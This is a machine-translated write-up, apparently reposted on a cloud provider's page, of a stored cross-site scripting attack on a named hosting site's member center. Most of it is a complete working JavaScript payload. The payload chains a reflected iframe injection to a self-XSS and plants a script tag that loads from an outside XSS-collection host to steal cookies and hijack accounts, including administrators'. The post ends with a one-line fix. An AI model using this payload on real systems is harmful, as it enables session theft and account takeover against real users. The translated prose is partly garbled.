Host house XSS return -- Use of Self-insertion points

Source: Internet
Author: User

The use of the host House Self-plug-in points can pass through. Host House member center personal information detailed address contact QQ there are stored XSS insert statement "> <input type =: hidden was originally a self-inserted point, and found no excessive modification of Personal Information (@ Xiaochuan. Looking for, found such an address http://www.zhujiwu.com/test/test.asp seems to be checking the white list of places, really do not know what this URL is used. The inserted url parameter is directly brought into the iframe framework. src is a white XSS, so that you can jump from this to the self-inserted position. So we construct javascript

<meta charset="utf8"><script lnaguage="javascript">    function createRequest(){        var xmlHttp=false;    if(window.XMLHttpRequest){        xmlHttp = new XMLHttpRequest();    }else if(window.ActiveXObject){        try{            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");        }catch(error1){            try{                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");            }catch(error2){                xmlHttp = false;            }        }    }        return xmlHttp;    }    var getAddress;    if(getAddress=createRequest()){        getAddress.open("GET","/member/account/basic.asp");        getAddress.onreadystatechange=updatePage;        getAddress.send(null);        }    var xml;    function updatePage()    {        if(getAddress.readyState == 4 )        {            if(getAddress.status == 200)            {                var str = getAddress.responseText;                rex = /name="Address" value="(.*)" size="38"/;                var ttt = rex.exec(str);                if(xml=createRequest()){                    xml.open("POST","/cmd/member/setBasic.asp?cmd=set");                    xml.onreadystatechange = attack;                    var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&";                    xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");                    xml.send(body);                                }            }else if(getAddress.status==404){                alert("404");            }else {                alert("status:"+getAddress.statusText);            }        }    }    function attack(){        if(xml.readyState == 4 ){            if(xml.status == 200){                            }        }    }</script>

 

You can get the current detailed address and insert your own code as a disguise. The host house does not have HTTPonly to demonstrate the final process of sending us access address: http://www.zhujiwu.com/test/test.asp? Url = xxxxx.sinaapp.com/xxxx.html cannot expose the sae address, such as this address. Original page: cookie received after url access



There are still a lot of people who can see personal information, such as administrators! In this way, personal users can be hijacked permanently! Above! Solution:Encode the output to the three locations!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.